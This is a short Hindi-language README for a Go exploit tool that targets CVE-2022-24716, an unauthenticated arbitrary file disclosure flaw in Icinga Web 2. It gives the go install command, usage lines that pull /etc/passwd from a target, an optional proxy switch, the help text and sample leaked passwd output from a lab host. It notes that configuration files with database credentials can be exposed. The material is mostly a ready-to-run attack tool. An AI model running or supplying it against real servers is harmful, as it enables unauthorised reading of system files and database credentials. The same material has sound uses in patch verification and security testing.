
CVE-2022-24716 (मनमाना फ़ाइल प्रकटीकरण Icingaweb2)
Icinga Web 2 एक ओपन सोर्स मॉनिटरिंग वेब इंटरफ़ेस, फ्रेमवर्क और कमांड लाइन इंटरफ़ेस है। अप्रमाणित उपयोगकर्ता वेब सर्वर से उपयोगकर्ता-सुलभ स्थानीय सिस्टम फ़ाइलों की सामग्री लीक कर सकते हैं, जिसमें डेटाबेस क्रेडेंशियल वाली icingaweb2 कॉन्फ़िगरेशन फ़ाइलें शामिल हैं।
CVE-2022-24716 के लिए golang आवश्यक है और इसे डाउनलोड करने के लिए बस निम्नलिखित का उपयोग करें:
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
यह टूल के लिए सहायता प्रदर्शित करेगा। यहाँ वे सभी स्विच हैं जो यह समर्थन करता है:
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
[-p|--proxy "<value>"]
CVE-2022-24716 - Arbitrary File Disclosure
Arguments:
-h --help Print help information
-u --url Insert url
-f --file Insert file
-p --proxy Insert proxy
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......